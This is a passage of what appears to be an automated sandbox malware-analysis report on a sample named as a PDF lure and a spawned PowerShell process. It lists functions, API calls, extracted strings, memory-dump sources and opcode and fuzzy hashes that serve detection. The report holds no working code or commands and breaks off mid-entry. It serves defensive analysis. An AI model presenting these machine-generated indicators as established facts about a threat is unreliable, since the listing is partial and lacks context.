Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E26,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405985
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E26,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405995

Strings

C:\Users\user\Desktop, xrefs: 0040597F

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-1246513382
Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
Instruction ID: 052b7d625f743090f45407db0d4342bedadcdb208645d65a5e8033f28458e035
Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
Instruction Fuzzy Hash: 4DD05EB2400A20DAD3226B08DC009AFB3ACEF113107464466F841A21A5D7786D818BE9

Function 00405AB9 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
lstrcmpiA.KERNEL32(00405CF3,00000000), ref: 00405AE1
CharNextA.USER32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF2
lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
Instruction ID: 0e21c6ccf38cfde73736f548742f9065f02c2b70c8696d75456ee166b8786c13
Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
Instruction Fuzzy Hash: 59F0C231604458AFCB12DBA4CD4099FBBA8EF06250B2140A6F801F7210D274FE019BA9

Analysis Process: powershell.exePID: 1864, Parent PID: 4912COMMON

Executed Functions

Function 0754C17E Relevance: 60.5, Strings: 47, Instructions: 1783COMMON

Download Yara Rule

Strings

tL`k, xrefs: 0754C1AB
(fnl, xrefs: 0754BC89
(fnl, xrefs: 0754C371
4'eq, xrefs: 0754CA49
(fnl, xrefs: 0754CB86
(fnl, xrefs: 0754C6CD
(fnl, xrefs: 0754C865
(fnl, xrefs: 0754C3FF
4kl, xrefs: 0754D37C
4'eq, xrefs: 0754D513
(fnl, xrefs: 0754D61E
(fnl, xrefs: 0754D92A
(fnl, xrefs: 0754C76F
(fnl, xrefs: 0754D940
(fnl, xrefs: 0754BF4F
(fnl, xrefs: 0754D62E
(fnl, xrefs: 0754DBA0
(fnl, xrefs: 0754C258
(fnl, xrefs: 0754CAF0
4'eq, xrefs: 0754CA3D
(fnl, xrefs: 0754D43C
x._k, xrefs: 0754C099
(fnl, xrefs: 0754C66C
4'eq, xrefs: 0754BDC2
4kl, xrefs: 0754D366
(fnl, xrefs: 0754BAC3
(fnl, xrefs: 0754CBE1
(fnl, xrefs: 0754C5A4
(fnl, xrefs: 0754D7CE
tL`k, xrefs: 0754C238
tL`k, xrefs: 0754BAA3
4'eq, xrefs: 0754BE66
-_k, xrefs: 0754C0E7
x._k, xrefs: 0754CD55
(fnl, xrefs: 0754D426
(fnl, xrefs: 0754BBB9
tL`k, xrefs: 0754D48C
(fnl, xrefs: 0754DBB6
(fnl, xrefs: 0754C80D
(fnl, xrefs: 0754D318
tL`k, xrefs: 0754BB99
-_k, xrefs: 0754CDA6
(fnl, xrefs: 0754BFB5
(fnl, xrefs: 0754D7B8
x._k, xrefs: 0754DA47
(fnl, xrefs: 0754C603
(fnl, xrefs: 0754D32E

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: (fnl$(fnl$(fnl$(fnl$(fnl$(fnl$(fnl$(fnl$(fnl$(fnl$(fnl$(fnl$(fnl$(fnl$(fnl$(fnl$(fnl$(fnl$(fnl$(fnl$(fnl$(fnl$(fnl$(fnl$(fnl$(fnl$(fnl$(fnl$(fnl$(fnl$4'eq$4'eq$4'eq$4'eq$4'eq$4kl$4kl$tL`k$tL`k$tL`k$tL`k$tL`k$x._k$x._k$x._k$-_k$-_k
API String ID: 0-903858752
Opcode ID: 3337e2908381b9b87c5767f344a77c4b877635121d27a53b529640fade1b4ab1
Instruction ID: c4f5c45241631ccb64eaa241d0fee1540efff4d3932f199e2b0d767431ef5526
Opcode Fuzzy Hash: 3337e2908381b9b87c5767f344a77c4b877635121d27a53b529640fade1b4ab1
Instruction Fuzzy Hash: 510360B0A05219DFDB24DF64C850BEAB7B2BF89304F10849AD5096B785CB72ED81CF95

Function 02FBEAD8 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2539158919.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2fb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b320574e2fd3fdf3b758b2ce2f5f8d4efdb585e1ab44ccde20a1bb775b2e161
Instruction ID: 66c8bda94c14b36512e8584dd0d9c7839aeef4fd9af65708d37c99ef3eb50564
Opcode Fuzzy Hash: 2b320574e2fd3fdf3b758b2ce2f5f8d4efdb585e1ab44ccde20a1bb775b2e161
Instruction Fuzzy Hash: 9CB16CB0E00219CFDB16CFAAC8857DEBBF2AF88354F548129D915A7294EB749845CF81

Function 02FBF3A8 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2539158919.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2fb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a91844ebef1770e354f4bd89f5ad4ee1ceaaed735d85f6af060efcc561d18b13
Instruction ID: a198b0dafe9a92e3d0ea602b9a15763a0e3b539fab980177d1be9fcb46f6128b
Opcode Fuzzy Hash: a91844ebef1770e354f4bd89f5ad4ee1ceaaed735d85f6af060efcc561d18b13
Instruction Fuzzy Hash: 28B14971E002098FDB11CFAACD817DDBBF2AF88354F248629E915E7664EB749841CF81

Function 07544CB0 Relevance: 33.6, Strings: 26, Instructions: 1118COMMON

Download Yara Rule

Strings

4'eq, xrefs: 07545109
4'eq, xrefs: 07544E66
4'eq, xrefs: 0754505E
4'eq, xrefs: 0754561F
(fnl, xrefs: 07545C8A
4'eq, xrefs: 07544F02
4'eq, xrefs: 07545052
4'eq, xrefs: 0754541B
4'eq, xrefs: 07544E5A
4'eq, xrefs: 07545613
4'eq, xrefs: 07545427
4'eq, xrefs: 07544FAA
4'eq, xrefs: 075454C3
4'eq, xrefs: 07544DB2
4'eq, xrefs: 075454CF
4'eq, xrefs: 07545370
(fnl, xrefs: 07545C94
4'eq, xrefs: 075451B1
4'eq, xrefs: 075450FD
4'eq, xrefs: 07544DBE
4'eq, xrefs: 075451A5
4'eq, xrefs: 0754537C
4'eq, xrefs: 0754556B
4'eq, xrefs: 07544FB6
4'eq, xrefs: 07544F0E
4'eq, xrefs: 07545577

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: (fnl$(fnl$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq
API String ID: 0-3906326167
Opcode ID: c75b31007bd12a4aaee81ab50a9461cf80edca413b614ccdc25a80c96dd878a8
Instruction ID: 3032dc67134858e6baa24cee815346fb7b77e3e8675b82acea61713357d3c10b
Opcode Fuzzy Hash: c75b31007bd12a4aaee81ab50a9461cf80edca413b614ccdc25a80c96dd878a8
Instruction Fuzzy Hash: 20A260B4A14204DFDB24CBA8C445B9EBBB2BF85708F64816DD9056F346CBB2DD428F91

Function 07543A90 Relevance: 24.6, Strings: 19, Instructions: 856COMMON

Download Yara Rule

Strings

(fnl, xrefs: 07544053
-_k, xrefs: 075446D4
4'eq, xrefs: 0754434D
(fnl, xrefs: 075444D6
x._k, xrefs: 07544686
(fnl, xrefs: 07543EED
(fnl, xrefs: 0754452B
(fnl, xrefs: 07543CCE
(fnl, xrefs: 075440F1
(fnl, xrefs: 07543CC4
(fnl, xrefs: 07543F56
(fnl, xrefs: 07544149
(fnl, xrefs: 07543FB7
(fnl, xrefs: 07543C0B
4'eq, xrefs: 07544359
(fnl, xrefs: 07543C15
(fnl, xrefs: 07543E8E
(fnl, xrefs: 075443FC
(fnl, xrefs: 07544406

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: (fnl$(fnl$(fnl$(fnl$(fnl$(fnl$(fnl$(fnl$(fnl$(fnl$(fnl$(fnl$(fnl$(fnl$(fnl$4'eq$4'eq$x._k$-_k
API String ID: 0-1036800733
Opcode ID: 95f57770c2eede7cebcb4523bd887cf0a0f83ff461ed6b79b12ef050b614b591
Instruction ID: 8901b1b7a1342639149e34b966a911b4cbbfd15737a68e2e5542ebbcea78ca53
Opcode Fuzzy Hash: 95f57770c2eede7cebcb4523bd887cf0a0f83ff461ed6b79b12ef050b614b591
Instruction Fuzzy Hash: E87280B0A01255DFDB24DF98C851BAAB7B2FF89304F1084AAD509AB755CB31ED82CF51

Function 07544C93 Relevance: 15.9, Strings: 12, Instructions: 902COMMON

Download Yara Rule

Strings

4'eq, xrefs: 07544FAA
4'eq, xrefs: 075454C3
4'eq, xrefs: 07544F02
4'eq, xrefs: 07544DB2
4'eq, xrefs: 075450FD
4'eq, xrefs: 07545052
4'eq, xrefs: 075451A5
4'eq, xrefs: 07545370
4'eq, xrefs: 0754556B
4'eq, xrefs: 0754541B
4'eq, xrefs: 07545613
4'eq, xrefs: 07544E5A

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: 4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq
API String ID: 0-1835389248
Opcode ID: 74060f1c9cf3647ac7bb71df5eb680dddb602dce0f08f434b70156680c4902ad
Instruction ID: 5f7066eab030572e54331e2023cc75bca116f9de9f292411772555cb9bb865d0
Opcode Fuzzy Hash: 74060f1c9cf3647ac7bb71df5eb680dddb602dce0f08f434b70156680c4902ad
Instruction Fuzzy Hash: D7825FB4A14204DFE724CBA8C441B9DBBB2BF85708F64816DD9056F342CBB6AD46CF91

Function 0754D093 Relevance: 11.7, Strings: 9, Instructions: 431COMMON

Download Yara Rule

Strings

tL`k, xrefs: 0754D48C
4'eq, xrefs: 0754D513
(fnl, xrefs: 0754D61E
4kl, xrefs: 0754D366
(fnl, xrefs: 0754D318
(fnl, xrefs: 0754D92A
(fnl, xrefs: 0754D7B8
x._k, xrefs: 0754DA47
(fnl, xrefs: 0754D426

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: (fnl$(fnl$(fnl$(fnl$(fnl$4'eq$4kl$tL`k$x._k
API String ID: 0-2268328505
Opcode ID: 8dc0f8a7e33853eefe448a11d7d3ee2a60689a5fbf4e4002c7d0802c778ebae0
Instruction ID: 575fd4493a6151611abb72d9c66121bf40e45494c952c15d598d91a8ac16c9ba
Opcode Fuzzy Hash: 8dc0f8a7e33853eefe448a11d7d3ee2a60689a5fbf4e4002c7d0802c778ebae0
Instruction Fuzzy Hash: 37121AB0A05319DFEB60CB14C851BE9B7B2BB45308F1084DAD64AAB791CB71ED81CF51

Function 07543178 Relevance: 10.4, Strings: 8, Instructions: 373COMMON

Download Yara Rule

Strings

4'eq, xrefs: 07543481
-_k, xrefs: 07543591
x._k, xrefs: 0754354C
(fnl, xrefs: 075432A3
4'eq, xrefs: 07543500
4'eq, xrefs: 0754348D
(fnl, xrefs: 07543299
4'eq, xrefs: 0754350C

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: (fnl$(fnl$4'eq$4'eq$4'eq$4'eq$x._k$-_k
API String ID: 0-2346548024
Opcode ID: ed3ab7286fbf1786df39addd267f6220c9f864b790a965a058ee7116d748657f
Instruction ID: 700469035ed7bb76aa6112e4a8b5a874606a743d46666ed0b52695f585b8ef25
Opcode Fuzzy Hash: ed3ab7286fbf1786df39addd267f6220c9f864b790a965a058ee7116d748657f
Instruction Fuzzy Hash: 78E18FB0A142059FDB14DBA8C845BAEBBA2FF88304F14C46AD5056F3A5CB76DC428F95

Function 0754315B Relevance: 6.6, Strings: 5, Instructions: 302COMMON

Download Yara Rule

Strings

4'eq, xrefs: 07543481
-_k, xrefs: 07543591
x._k, xrefs: 0754354C
4'eq, xrefs: 07543500
(fnl, xrefs: 07543299

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: (fnl$4'eq$4'eq$x._k$-_k
API String ID: 0-1721523281
Opcode ID: 82e03ff134a7aa6f272d43c592a66e31d292b1777517c18622c854b0126cff69
Instruction ID: 6147b812dd410633a21da2bae8ca52444693725ffe54202708358a4595d490d9
Opcode Fuzzy Hash: 82e03ff134a7aa6f272d43c592a66e31d292b1777517c18622c854b0126cff69
Instruction Fuzzy Hash: FEC17DB0A042059FDB15CBA8C841BEEBBB2BF88308F15C55AD5056F365CB75E846CF91

Function 02FBAFE8 Relevance: 4.3, Strings: 3, Instructions: 522COMMON

Download Yara Rule

Strings

Hiq, xrefs: 02FBB0AE
$eq, xrefs: 02FBB567
$eq, xrefs: 02FBB202

Memory Dump Source

Source File: 00000002.00000002.2539158919.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2fb0000_powershell.jbxd

Similarity

API ID:
String ID: Hiq$$eq$$eq
API String ID: 0-2852621797
Opcode ID: 7a05c026486a9591b9af48167867fc74b42fd266ab90e346d8fed205784d947d
Instruction ID: a4c285c5ae2c015e9ffe97006f2f093122720a83c2d2095205f4495d8e867326
Opcode Fuzzy Hash: 7a05c026486a9591b9af48167867fc74b42fd266ab90e346d8fed205784d947d
Instruction Fuzzy Hash: AC224034B002148FCB2AEB25D8547EEBBB6AF89345F1440E9D909AB361DF359D81CF81

Function 07540F18 Relevance: 3.8, Strings: 3, Instructions: 94COMMON

Download Yara Rule

Strings

$eq, xrefs: 07540F2A
$eq, xrefs: 07540F80
$eq, xrefs: 07540F74

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: $eq$$eq$$eq
API String ID: 0-177832560
Opcode ID: a62ee979ea7846f5a3358af5427b4c6bbc12598dd7243f5456d4b055d14b195c
Instruction ID: 554b4de93f9636b93dd12d09c9ae07f3b18b51d6af292f5a6b38420df5cbb78f
Opcode Fuzzy Hash: a62ee979ea7846f5a3358af5427b4c6bbc12598dd7243f5456d4b055d14b195c
Instruction Fuzzy Hash: 7C214CB2314206ABDB3497BA98807A776D6AFC0318F34847B960DC72C5DE75D8428365

Function 07546278 Relevance: 2.7, Strings: 2, Instructions: 241COMMON

Download Yara Rule

Strings

(fnl, xrefs: 075463BC
(fnl, xrefs: 075463B2

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: (fnl$(fnl
API String ID: 0-3489445741
Opcode ID: 92db162971f23cd01c08352fb22551fcc14fff1b7e4d62efbd26ff391a3ec5e3
Instruction ID: 7e903bc13681636c9b172cfc2825c94411ccbe10b58df1a43b23a5f9e2d570ed
Opcode Fuzzy Hash: 92db162971f23cd01c08352fb22551fcc14fff1b7e4d62efbd26ff391a3ec5e3
Instruction Fuzzy Hash: F0916DB0A002059FDB14CF98C545BEABBF2FF9A318F54806AD505AB355CB72EC418F91

Function 0754625F Relevance: 1.5, Strings: 1, Instructions: 218COMMON

Download Yara Rule

Strings

(fnl, xrefs: 075463B2

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: (fnl
API String ID: 0-3085075461
Opcode ID: 66ea66aa7d482921e824248b97e174d8daed6e8dec3bea4e287808f59ed430f6
Instruction ID: 6c153c4fe465b9224a7fb3af906e4a5b572df99a62801ab7ebd58a4fd9e54dbf
Opcode Fuzzy Hash: 66ea66aa7d482921e824248b97e174d8daed6e8dec3bea4e287808f59ed430f6
Instruction Fuzzy Hash: 7C915AB0A042059FDB14CF94C181BEABBF2FF9A318F5581AAD5056B355CB72E881CF91

Function 02FBCF5C Relevance: 1.4, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

$eq, xrefs: 02FBCFDC

Memory Dump Source

Source File: 00000002.00000002.2539158919.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2fb0000_powershell.jbxd

Similarity

API ID:
String ID: $eq
API String ID: 0-731066626
Opcode ID: 88feb373df08897f3355f12c87ae5b40edcadb5be992b01ad1655663bd068c37
Instruction ID: 734c4bf1c0521d338ce5beedf61ce6d089c0fe70a66a4dcfca652c70551710c0
Opcode Fuzzy Hash: 88feb373df08897f3355f12c87ae5b40edcadb5be992b01ad1655663bd068c37
Instruction Fuzzy Hash: 975115B1D00348CFDB11CFAAC984ADEBFB5BF48750F24812AD509AB254DB746946CF91

Function 02FBCF68 Relevance: 1.4, Strings: 1, Instructions: 117COMMON

Download Yara Rule

Strings

$eq, xrefs: 02FBCFDC

Memory Dump Source

Source File: 00000002.00000002.2539158919.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2fb0000_powershell.jbxd

Similarity

API ID:
String ID: $eq
API String ID: 0-731066626
Opcode ID: f8c537f18b87cf39572136e7ae52672af5f5c4bf1582f0a08dcc745f3c1e89c2
Instruction ID: 309ad2fe02c8b56ee20d71ff90a694dae501d831d94732af76f123a1971165dc
Opcode Fuzzy Hash: f8c537f18b87cf39572136e7ae52672af5f5c4bf1582f0a08dcc745f3c1e89c2
Instruction Fuzzy Hash: 2A5105B1D00308DFDB10CFAAC980ADEBFB5BF48750F24812AD509AB254DB746946CF91

Function 07543618 Relevance: 1.4, Strings: 1, Instructions: 102COMMON

Download Yara Rule

Strings

x._k, xrefs: 075436CA

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: x._k
API String ID: 0-1516225998
Opcode ID: 4eca148e2a565c1bb19fed3e9f232d6b07b5b23cfc994e6cc0c780fcdb400092
Instruction ID: 1ae88bf4257ecd333e952be5c729feca6b68d7404d6d35593508b5accb4212e1
Opcode Fuzzy Hash: 4eca148e2a565c1bb19fed3e9f232d6b07b5b23cfc994e6cc0c780fcdb400092
Instruction Fuzzy Hash: 5831D6B0B41104AFE70497B8C851BEEBAA3EF94304F14C419E9016F7A1CFB59D428FA1

Function 07541178 Relevance: .4, Instructions: 384COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cad7756ef68ca9f78361b2275a16557995c46e6a94d17b6bb2ed943ca1ebf1dc
Instruction ID: 6c46219ffb545b5393f4e7d40ee23360747170def71c86206209863d52d21140
Opcode Fuzzy Hash: cad7756ef68ca9f78361b2275a16557995c46e6a94d17b6bb2ed943ca1ebf1dc
Instruction Fuzzy Hash: 8DE15FB4B10609DFDB14CF98C541AA9BBB2FF89318F14C06AD9059F355CB72DC828B92

Function 0754115B Relevance: .3, Instructions: 342COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 491b35b8d12353cc7e7d10d9b5b8c5232f07c1959852a5a55ddc8bde308833f6
Instruction ID: 8417537ca14227a93a6608e2b88c34fd2aa40187fcdb6d217d1a2af63beaa7b4
Opcode Fuzzy Hash: 491b35b8d12353cc7e7d10d9b5b8c5232f07c1959852a5a55ddc8bde308833f6
Instruction Fuzzy Hash: 1FE15DB4A00609DFDB10CF98C541AE9BBB2FF89318F14C15AE9059B352C772ED82CB91

Function 02FB72A0 Relevance: .3, Instructions: 313COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2539158919.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2fb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9296b8cb6c3a35b73741a4cdb87c6b03f98c312b5c6ad57b0a9f38fd58c03b11
Instruction ID: 931cb6dd4b09b27912540ed572a8bd397f79b6e5e15d9c6d230bc6988d5317a3
Opcode Fuzzy Hash: 9296b8cb6c3a35b73741a4cdb87c6b03f98c312b5c6ad57b0a9f38fd58c03b11
Instruction Fuzzy Hash: 97C18D32A00248CFCB15EFA5D944A9DFBB2FFC4350F258559E506AB365CB34AD45CB80

Function 02FBEACE Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2539158919.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2fb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f8eccea6d028843bb27c7be9e1c7746284238fb6409b5ec4c4bd15ecbd869b5
Instruction ID: 0fd2976ad09267be17aece292d7e2a6a9a33230ef4e3a258187db500f09b4a99
Opcode Fuzzy Hash: 4f8eccea6d028843bb27c7be9e1c7746284238fb6409b5ec4c4bd15ecbd869b5
Instruction Fuzzy Hash: 3FB16CB0E00219CFDB12CFAAC8857DDBBF2BF48394F548129E915A7294EB749845CF91

Function 02FBF39E Relevance: .3, Instructions: 263COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2539158919.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2fb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00c08e83fbeda3db377224dc8a8b80c5520678b1b7f1aaea4897753a19507be1
Instruction ID: c047b67ffd105c2ed85e8f522908f56cf11e6b6c1e4af3c2aa20f9a27733937c
Opcode Fuzzy Hash: 00c08e83fbeda3db377224dc8a8b80c5520678b1b7f1aaea4897753a19507be1
Instruction Fuzzy Hash: 77B14970E00209CFDB11CFAAC9817DDBBF2AF48354F248229E915A7664EB749841CF81

Function 02FB7A68 Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2539158919.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2fb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9c57e533f0a233d72b55f19956a88625e35472af0537d0e86fcfc34ec9ffaa0
Instruction ID: 95e50c6dd76e1ca11e4f67ceeb3796ad6e013bbd2963077da75984e90a39f771
Opcode Fuzzy Hash: a9c57e533f0a233d72b55f19956a88625e35472af0537d0e86fcfc34ec9ffaa0
Instruction Fuzzy Hash: C5719B32A042098FCB15EF69C880AADFBF6FF85354F14896AD4199B251DB71AC46CB90

Function 02FB7BD6 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2539158919.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2fb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 996c14a70d07320ec8ccf15c73e4088ecd2008160d7e9b436b5c16fa57e220d3
Instruction ID: 5caf632301e265ef1749790bdd57aa732e14d98a8bb17796bccef9f0790d542e
Opcode Fuzzy Hash: 996c14a70d07320ec8ccf15c73e4088ecd2008160d7e9b436b5c16fa57e220d3
Instruction Fuzzy Hash: C5713872E00209DFDB15EFA5D440BEDFBB6BF88344F148569D402AB2A4DB74AD46CB80

Function 07549488 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
